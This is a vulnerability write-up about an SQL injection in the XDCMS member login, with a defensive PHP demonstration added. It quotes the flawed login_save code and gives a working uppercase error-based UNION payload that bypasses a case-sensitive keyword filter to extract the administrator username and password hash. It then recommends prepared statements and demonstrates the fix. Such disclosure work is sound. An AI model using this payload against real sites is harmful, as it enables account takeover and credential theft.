The latest version of the XDCMS enterprise management system filters login input too loosely: the filter can be bypassed, which leaves the login function open to SQL injection. Look at the file \system\modules\member\index.php: login_save is called during login to verify the credentials, and the problem lies in the login_save function of index.php:
```php
public function login_save() {
    // The username is taken from POST and run through safe_html only. This is the
    // filter that can be bypassed, and the injection enters here.
    $username = safe_html($_POST['username']);
    $password = safe_html($_POST['password']);
    if (empty($username) || empty($password)) {
        showmsg(C('user_pass_empty'), '-1');
    }
    // Injection point: the filtered username is concatenated straight into the query.
    $sql = "select * from " . DB_PRE . "member where `username`='$username'";
    // The query is executed here, so a payload that survives safe_html runs here.
    if ($this->mysql->num_rows($sql) == 0) {
        showmsg(C('member_not_exist'), '-1');
    }
    $password = md5(md5($password));
    $rs = $this->mysql->get_one($sql);
    if ($password != $rs['password']) {
        showmsg(C('password_error'), '-1');
    }
    if ($rs['is_lock'] == 1) {
        showmsg(C('user_lock'), '-1');
    }
    $logins = $rs["logins"] + 1;
    $ip = safe_replace(safe_html(getip()));
    $this->mysql->db_update("member",
        "`last_ip`='" . $ip . "',`last_time`=" . datetime() . ",`logins`=" . $logins,
        "`username`='$username'");
    cookie::_setcookie(array('name' => 'member_user', 'value' => $username));
    cookie::_setcookie(array('name' => 'member_userid', 'value' => $rs['userid']));
    cookie::_setcookie(array('name' => 'member_groupid', 'value' => $rs['groupid']));
    unset($rs);
    showmsg(C("login_success"), "index.php?m=member");
}
```
The username is passed through safe_html, but safe_html only strips a list of sensitive words plus the characters = and *, and it matches those words in lowercase only. That is a defect rather than a defense: an SQL statement written in uppercase keywords and built without = or * passes through untouched. Capture the login request and append the following to the username value:

' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM c_admin LIMIT 0,1)) a FROM information_schema.tables GROUP BY a) b #

The leading quote closes the string literal and the trailing # comments out the original closing quote; the 14 numbered columns match the column count of the member table so the UNION is accepted. count(1) and round(rand(0)) take the place of the usual count(*) and floor(rand(0)*2) so that no * is needed, and grouping by a value derived from rand(0) forces a duplicate-key error whose message contains the first row of c_admin: the administrator's username and password hash, separated by # (0x23). This is error-based injection, so it relies on the MySQL error text being shown to the user.
Solution: strict filtering. Do not rely on a lowercase keyword blocklist: escape the username properly before it is placed in the SQL statement, or better, pass it as a bound parameter of a prepared statement so the database never parses it as SQL; any filter that remains must match case-insensitively.
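As an added example that is not part of the original write-up or of XDCMS itself: a stand-in for the case-sensitive blocklist that safe_html is described as being, placed next to the parameterised lookup the solution calls for. The keyword list in naive_filter, the helper names (naive_filter, vulnerable_query, verify_login), the table name c_member and the use of SQLite through the pdo_sqlite extension are all assumptions; the payload is the one from the write-up above. It shows the uppercase payload passing through the filter into the query text while the bound-parameter version treats the same payload as a plain string that matches no user.

```php
<?php
// Added example, not XDCMS code. naive_filter imitates a case-sensitive keyword
// blocklist of the kind the write-up describes safe_html as being (the exact
// keyword list is an assumption). SQLite in memory stands in for MySQL and
// assumes the pdo_sqlite extension is available.

function naive_filter(string $s): string
{
    // Only lowercase keywords and the characters '=' and '*' are removed,
    // so 'UNION SELECT' written in uppercase passes through untouched.
    $bad = ['union', 'select', 'from', 'where', 'insert', 'update', 'delete', '=', '*'];
    return str_replace($bad, '', $s);
}

function vulnerable_query(string $username): string
{
    // Mirrors login_save: the filtered value is concatenated into the SQL text.
    return "select * from c_member where `username`='" . naive_filter($username) . "'";
}

// Hardened form: the username is bound as a parameter, so the database engine
// never parses it as SQL and no keyword filter is needed at all.
function verify_login(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT password FROM c_member WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;
    }
    // Same md5(md5()) scheme as login_save, kept only to match it, but compared
    // in constant time.
    return hash_equals($row['password'], md5(md5($password)));
}

// The write-up's payload: uppercase keywords, and count(1) / round(rand(0))
// in place of count(*) / floor(rand(0)*2) so that neither '=' nor '*' appears.
$payload = "' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM "
    . "(SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) "
    . "FROM c_admin LIMIT 0,1)) a FROM information_schema.tables GROUP BY a) b #";

// The uppercase payload survives the filter and rewrites the query; the same
// injection written in lowercase is mangled by the filter instead.
echo vulnerable_query($payload), PHP_EOL;
echo vulnerable_query("admin' union select 1 #"), PHP_EOL;

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE c_member (userid INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$ins = $db->prepare('INSERT INTO c_member (username, password) VALUES (:u, :p)');
// Constructed sample user for the demonstration.
$ins->execute([':u' => 'alice', ':p' => md5(md5('secret'))]);

// With a bound parameter the payload is just a username that matches no row,
// so the login fails the same way as any unknown user.
var_dump(verify_login($db, 'alice', 'secret'));
var_dump(verify_login($db, 'alice', 'wrong'));
var_dump(verify_login($db, $payload, 'anything'));
```

Run it with the PHP CLI; the first echo prints the query text with the UNION intact, the second shows the lowercase variant with its keywords stripped, and the three var_dump lines show that only the correct username and password pair authenticates under the prepared-statement version.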